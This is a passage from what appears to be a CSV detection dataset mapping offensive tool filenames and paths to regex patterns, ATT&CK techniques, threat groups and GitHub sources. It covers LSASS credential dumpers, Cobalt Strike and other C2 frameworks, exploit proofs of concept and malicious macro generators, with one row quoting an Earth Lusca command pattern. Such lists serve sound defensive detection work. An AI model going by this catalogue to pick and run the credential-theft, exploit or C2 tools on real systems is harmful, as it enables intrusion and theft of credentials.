Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*/lookupsid.py*",".{0,1000}\/lookupsid\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/LooneyPwner.git*",".{0,1000}\/LooneyPwner\.git.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","1","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "*/looneypwner.sh*",".{0,1000}\/looneypwner\.sh.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","1","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "*/loot_default/*.exe*",".{0,1000}\/loot_default\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet 
penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/loot_default/*.ps1*",".{0,1000}\/loot_default\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/loot_default/*.py*",".{0,1000}\/loot_default\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/loot_finder*",".{0,1000}\/loot_finder.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. 
JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/lpBunny/bof-registry*",".{0,1000}\/lpBunny\/bof\-registry.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*/lsa_dump_*.txt*",".{0,1000}\/lsa_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory 
Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/lsarelayx.git*",".{0,1000}\/lsarelayx\.git.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*/lsass.DMP*",".{0,1000}\/lsass\.DMP.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*/lsass.rar*",".{0,1000}\/lsass\.rar.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*/lsass.zip*",".{0,1000}\/lsass\.zip.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" 
"*/lsass/beacon.h*",".{0,1000}\/lsass\/beacon\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/Lsass_Shtinkering.cpp*",".{0,1000}\/Lsass_Shtinkering\.cpp.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*/Lsass_Shtinkering.exe*",".{0,1000}\/Lsass_Shtinkering\.exe.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*/LSASSProtectionBypass/CredGuard.c*",".{0,1000}\/LSASSProtectionBypass\/CredGuard\.c.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*/Lsass-Shtinkering.git*",".{0,1000}\/Lsass\-Shtinkering\.git.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*/LsassSilentProcessExit.git*",".{0,1000}\/LsassSilentProcessExit\.git.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*/lsassy*",".{0,1000}\/lsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*/lsassy_dump.py*",".{0,1000}\/lsassy_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - 
T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/lucksec/CVE-2022-0847*",".{0,1000}\/lucksec\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/lucksec/CVE-2022-0847","1","1","N/A","N/A","1","1","4","2022-03-08T01:50:39Z","2022-03-08T01:17:09Z" "*/lu-enum.nse*",".{0,1000}\/lu\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/luijait/arpspoofing*",".{0,1000}\/luijait\/arpspoofing.{0,1000}","offensive_tool_keyword","arpspoofing","arp spoofing scripts","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/arpspoofing","1","1","N/A","N/A","1","21","1","2022-03-10T04:44:36Z","2021-06-29T22:57:51Z" "*/ly4k/Pachine*",".{0,1000}\/ly4k\/Pachine.{0,1000}","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","1","N/A","8","3","268","38","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" "*/lyncsmash/*",".{0,1000}\/lyncsmash\/.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*/LyncSniper.ps1*",".{0,1000}\/LyncSniper\.ps1.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*/m *.lnk* /c *cmd /c echo f|xcopy @file %temp%*",".{0,1000}\/m\s.{0,1000}\.lnk.{0,1000}\s\/c\s.{0,1000}cmd\s\/c\secho\sf\|xcopy\s\@file\s\%temp\%.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/m3-gen.py *",".{0,1000}\/m3\-gen\.py\s.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 
- TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","492","121","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "*/m4ll0k/*",".{0,1000}\/m4ll0k\/.{0,1000}","offensive_tool_keyword","Github Username","github username 'hacker' hosting exploitation tools and password attack tools","N/A","N/A","N/A","N/A","Credential Access","https://github.com/m4ll0k","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/m8r0wn/*",".{0,1000}\/m8r0wn\/.{0,1000}","offensive_tool_keyword","Github Username","pentester github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/m8r0wn","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/MAAD-AF.git*",".{0,1000}\/MAAD\-AF\.git.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*/MaccaroniC2*",".{0,1000}\/MaccaroniC2.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*/MacroMeter*",".{0,1000}\/MacroMeter.{0,1000}","offensive_tool_keyword","MacroMeter","VBA Reversed TCP Meterpreter Stager CSharp Meterpreter Stager build by Cn33liz and 
embedded within VBA using DotNetToJScript from James Forshaw https://github.com/tyranid/DotNetToJScript","T1027 - T1059 - T1564 - T1071","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/MacroMeter","1","0","N/A","N/A","1","63","24","2018-04-23T09:14:49Z","2017-05-16T20:04:41Z" "*/MacroPatterns.cs*",".{0,1000}\/MacroPatterns\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/Macro-Payloads.py*",".{0,1000}\/Macro\-Payloads\.py.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/MacroWord_Payload/macro.txt*",".{0,1000}\/MacroWord_Payload\/macro\.txt.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation 
tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "*/magnitude.profile*",".{0,1000}\/magnitude\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/MailRaider.ps1*",".{0,1000}\/MailRaider\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controller running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - 
TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*/MailRaider.ps1*",".{0,1000}\/MailRaider\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1129","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/MailSniper/*",".{0,1000}\/MailSniper\/.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for 
specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*/main/cve-2022-0847.c*",".{0,1000}\/main\/cve\-2022\-0847\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","48","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" "*/main/exploit.js",".{0,1000}\/main\/exploit\.js","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","263","59","2023-12-05T12:21:02Z","2023-01-30T12:57:48Z" "*/main/exploit.pdf",".{0,1000}\/main\/exploit\.pdf","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","263","59","2023-12-05T12:21:02Z","2023-01-30T12:57:48Z" "*/Maitm/Bells.py*",".{0,1000}\/Maitm\/Bells\.py.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*/MakeMeEnterpriseAdmin.ps1*",".{0,1000}\/MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*/malDll.dll*",".{0,1000}\/malDll\.dll.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*/MaliciousMacroMSBuild*",".{0,1000}\/MaliciousMacroMSBuild.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","1","N/A","8","5","492","121","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "*/malleable-c2*",".{0,1000}\/malleable\-c2.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*/MalSCCM.git*",".{0,1000}\/MalSCCM\.git.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*/MalSCCM.sln*",".{0,1000}\/MalSCCM\.sln.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy 